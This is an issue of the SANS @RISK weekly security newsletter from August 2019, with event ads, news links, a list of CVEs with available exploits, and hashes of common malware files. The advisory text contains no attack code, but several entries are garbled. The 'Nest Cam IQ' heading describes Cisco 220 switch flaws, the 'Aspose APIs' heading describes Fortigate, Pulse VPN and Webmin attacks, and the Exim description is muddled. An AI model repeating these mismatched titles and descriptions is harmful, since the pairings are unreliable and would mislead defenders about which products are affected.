@RISK provides a reliable weekly summary of (1) newly discovered attack vectors, (2) vulnerabilities with active new exploits, (3) insightful explanations of how recent attacks worked, and other valuable data
A key purpose of the @RISK is to provide the data that will ensure that the 20 Critical Controls (the US and UK benchmark for effective protection of networked systems) continue to be the most effective defenses for all known attack vectors. But since it is also valuable for security practitioners, SANS is making it available to the 145,000 security practitioners who have completed SANS security training and others at their organizations who hope to stay current with the offensive methods in use.
August 29, 2019=============================================================
@RISK: The Consensus Security Vulnerability Alert
August 29, 2019 - Vol. 19, Num. 35
Providing a reliable, weekly summary of newly discovered attack vectors,
vulnerabilities with active exploits, and explanations of how recent
attacks worked
Archived issues may be found at http://www.sans.org/newsletters/at-risk
=============================================================
CONTENTS:
NOTABLE RECENT SECURITY ISSUES
INTERESTING NEWS FROM AROUND THE SECURITY COMMUNITY
VULNERABILITIES FOR WHICH EXPLOITS ARE AVAILABLE
MOST PREVALENT MALWARE FILES Aug. 22 - 29
============================================================
TOP VULNERABILITY THIS WEEK: Cisco 220 smart switches open to data leak
*************** Sponsored By AWS Marketplace ***************
Securing Applications in AWS. Experts from SANS, AWS and Fortinet explain the differences and similarities between securing cloud-based apps and hosting apps in-house. Learn how to assess your AppSec needs with consideration to AWS Marketplace offerings. Also, find out which tools and best practices you can use to improve the security of your applications. Webcast: Sept. 11, 2:00 PM ET. http://www.sans.org/info/214040
============================================================
TRAINING UPDATE
-- SANS Network Security 2019 | Las Vegas, NV | September 9-16 | https://www.sans.org/event/network-security-2019
-- SANS London September 2019 | September 23-28 | https://www.sans.org/event/london-september-2019
-- SANS Northern VA Fall-Reston 2019 | September 30-October 5 | https://www.sans.org/event/northern-va-fall-reston-2019
-- SANS DFIR Europe Summit and Training 2019 | Prague, CZ | September 30-October 6 | https://www.sans.org/event/dfir-prague-2019
-- SANS Tokyo Autumn 2019 | September 30-October 12 | https://www.sans.org/event/tokyo-autumn-2019
-- SANS Baltimore Fall 2019 | October 7-12 | https://www.sans.org/event/baltimore-fall-2019
-- SIEM Summit & Training 2019 | Chicago, IL | October 7-14 | https://www.sans.org/event/siem-summit-2019
-- SANS October Singapore 2019 | October 7-26 | https://www.sans.org/event/october-singapore-2019
-- Purple Team Summit & Training 2019 | Dallas, TX | October 21-28 | https://www.sans.org/event/purple-team-summit-2019
-- SANS OnDemand and vLive Training
Get free GIAC Cert Attempt or Take $350 off with OnDemand or vLive training through September 4.
https://www.sans.org/online-security-training/specials/
-- Can't travel? SANS offers online instruction for maximum flexibility
-- Live Daytime training with Simulcast - https://www.sans.org/simulcast
-- Evening training 2x per week for 6 weeks with vLive | https://www.sans.org/vlive
-- Anywhere, Anytime access for 4 months with OnDemand format | https://www.sans.org/ondemand/
-- Single Course Training
SANS Mentor | https://www.sans.org/mentor/about
Community SANS | https://www.sans.org/community/
-- View the full SANS course catalog and Cyber Security Skills Roadmap
https://www.sans.org/cyber-security-skills-roadmap
********************** Sponsored Links: ********************
1) What are the key processes, skills and technologies required for an effective supply chain security program? Register for this webcast: http://www.sans.org/info/214050
2) Take the SANS 2019 Endpoint Survey and enter for a chance to win a $400 Amazon gift card: http://www.sans.org/info/214055
3) Webcast September 3rd at 1 PM ET: Getting the Knack of ATT&CK(TM). http://www.sans.org/info/214060
============================================================
NOTABLE RECENT SECURITY ISSUES
SELECTED BY THE TALOS SECURITY INTELLIGENCE AND RESEARCH GROUP
Title: Nest Cam IQ camera open to takeover, data disclosure
Description: Two vulnerabilities in Cisco's 220 series of smart switches for small businesses could allow an attacker to leak sensitive information or inject malicious code. CVE-2019-1912 could allow an attacker to bypass security checks on the switch and upload arbitrary files. And CVE-2019-1913 opens the switches to a buffer overflow attack, which could be used to gain the ability to remotely execute code on the machine with root privileges.
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190806-sb220-rce
Snort SIDs: 51293 - 51295 (Written by John Levy), 51298 - 51300 (Written by Amit Raut), 51306 - 51307 (Written by Tim Muniz)
Title: Aspose APIs contain bugs that could lead to remote code execution
Description: Attackers are actively exploiting vulnerabilities in the Fortigate and Pulse VPN services to steal encryption keys, passwords and other sensitive data. These campaigns, which started last week, target the Webmin utility for managing Linux and *NIX systems. These are devices in enterprise networks, and the vulnerabilities involved could allow an attacker to take complete control of a system.
Snort SIDs: 51240 - 51243 (Written by John Levyu), 51288, 51289 (Written by Joanne Kim)
============================================================
INTERESTING NEWS FROM AROUND THE SECURITY COMMUNITY
Apple repatched a vulnerability in iOS that could allow iPhone users to jailbreak their devices -- a week after a hacker discovered an older patch had been undone.
https://www.cnet.com/news/apple-releases-ios-12-4-1-to-reportedly-fix-iphone-jailbreak/
The U.S. is close to launching a program to focus on protecting the 2020 U.S. presidential election from a ransomware attack.
https://www.cnbc.com/2019/08/26/us-officials-fear-ransomware-attack-against-2020-election.html
An independent security researcher dropped a zero-day vulnerability in Valve's Steam video game launcher after Valve banned him from the company's bug bounty program.
New emails uncovered between Facebook employees show that the social media giant may have known earlier than initially disclosed about Cambridge Analytica's mishandling of users' data.
https://techcrunch.com/2019/08/23/facebook-really-doesnt-want-you-to-read-these-emails/
Mobile carriers say an agreement with the U.S. government will start cutting down on robocalls, but researchers are skeptical of how effective the rules will be.
Spammers have started using Google calendar invites as a new form of social engineering.
Courthouses in Georgia are still using paper records to keep track of criminal cases and traffic citations months after a ransomware attack.
A recent round of ransomware attacks on cities in Texas could encourage attackers to carry out similar campaigns in the future.
https://www.cnbc.com/2019/08/22/texas-ransomware-attacks-tell-the-us-cybersecurity-story.html
=========================================================
RECENT VULNERABILITIES FOR WHICH EXPLOITS ARE AVAILABLE
COMPILED BY THE QUALYS VULNERABILITY RESEARCH TEAM
This is a list of recent vulnerabilities for which exploits are
available. System administrators can use this list to help in
prioritization of their remediation activities. The Qualys Vulnerability
Research Team compiles this information based on various exploit
frameworks, exploit databases, exploit kits and monitoring of internet
activity.
ID: CVE-2019-11510
Title: Pulse Secure Arbitrary File Disclosure Vulnerability
Vendor: Pulse Secure
Description: Pulse Connect Secure is exposed to arbitrary file disclosure vulnerability. An attacker can exploit these issues to access arbitrary files in the context of the application, write arbitrary files, or can send a specially crafted URI to perform an arbitrary file reading vulnerability .
CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
ID: CVE-2019-8605
Title: Apple MacOS Information Disclosure Vulnerability
Vendor: Apple
Description: A remote attacker could exploit this vulnerability to cause disclosure of information, unauthorized modification and arbitrary code execution with system privileges. A malicious application may be able to execute arbitrary code with system privileges," reads the advisory published by Apple. "A use after free issue was addressed with improved memory management." The vulnerability was initially reported by Google Project Zero white hacker Ned Williamson, who also published an exploit for iOS 12.2, dubbed "SockPuppet," after the first patch was released.
CVSS v2 Base Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
ID: CVE-2019-12527
Title: Squid Buffer Overflow Vulnerability
Vendor: Squid
Description: Squid is exposed to a heap based buffer overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.When checking Basic Authentication with HttpHeader, Squid uses a global buffer to store the decoded data. Squid does not check that the decoded length is not greater than the buffer, leading to a heap-based buffer overflow with user controlled data. Successfully exploiting this issue allow attackers to execute arbitrary code in the context of the affected application.
CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
ID: CVE-2019-15107
Title: Webmin Unauhenticated Remote Command Execution Vulnerability
Vendor: Webmin
Description: Webmin is exposed to a vulnerability that allows remote command execution. The parameter old in password_change.cgi contains a command injection vulnerability. Webmin versions are only vulnerable if changing of expired passwords is enabled. Successful exploitation may allow remote attacker to execute arbitrary commands on target system.
CVSS v2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
ID: CVE-2019-15092
Title: Wordpress Plugin Remote code Execution Vulnerability
Vendor: WordPress
Description: Wordpress Plugin is exposed to CSV injection vulnerability. This allows any application user to inject commands as part of the fields of his profile and these commands are executed when a user with greater privilege exports the data in CSV and opens that file on his machine. The webtoffee "WordPress Users & WooCommerce Customers Import Export" plugin 1.3.0 for WordPress allows CSV injection in the user_url, display_name, first_name, and last_name columns in an exported CSV file created by the WF_CustomerImpExpCsv_Exporter class.
CVSS v2 Base Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
ID: CVE-2019-11013
Title: Nimble Streamer Directory Traversal Vulnerability
Vendor: Nimble Streamer
Description: Nimble Streamer is exposed to a "../"" directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server.
CVSS v2 Base Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
ID: CVE-2019-10149
Title: Exim Local Privilege Escalation Vulnerability
Vendor: Exim
Description: Exim is affected by remote command execution vulnerability. The vulnerability is exploitable instantly by a local attacker, remotely exploit this vulnerability in the default configuration, an attacker must keep a connection to the vulnerable server open for 7 days (by transmitting one byte every few minutes), faster methods may exist. Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.
CVSS v2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
=========================================================
MOST PREVALENT MALWARE FILES Aug. 22 - 29:
COMPILED BY THE TALOS SECURITY INTELLIGENCE AND RESEARCH GROUP
SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
VirusTotal: https://www.virustotal.com/gui/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos
SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
VirusTotal: https://www.virustotal.com/gui/file/7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510/details
Typical Filename: xme64-2141.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG
SHA 256: 1755c179f08a648a618043a5af2314d6a679d6bdf77d4d9fca5117ebd9f3ea7c
MD5: c785a8b0be77a216a5223c41d8dd937f
VirusTotal: https://www.virustotal.com/gui/file/1755c179f08a648a618043a5af2314d6a679d6bdf77d4d9fca5117ebd9f3ea7c/details
Typical Filename: cslast.gif
Claimed Product: N/A
Detection Name: W32.1755C179F0-100.SBX.TG
SHA 256: 46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08
MD5: db69eaaea4d49703f161c81e6fdd036f
VirusTotal: https://www.virustotal.com/gui/file/46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08/details
Typical Filename: invoice.exe
Claimed Product: N/A
Detection Name: W32.46B241E3D3-95.SBX.TG
SHA 256: 093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7
MD5: 3c7be1dbe9eecfc73f4476bf18d1df3f
VirusTotal: https://www.virustotal.com/gui/file/093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7/details
Typical Filename: sayext.gif
Claimed Product: N/A
Detection Name: W32.093CC39350-100.SBX.TG
=============================================================
(c) 2019. All rights reserved. The information contained in this
newsletter, including any external links, is provided "AS IS," with no
express or implied warranty, for informational purposes only.
Please feel free to share this with interested parties via email, but
no posting is allowed on web sites. For a free subscription, (and for
free posters) or to update a current subscription, visit
SANS Institute, 8120 Woodmont Ave., Suite 310, Bethesda, MD 20814-2743
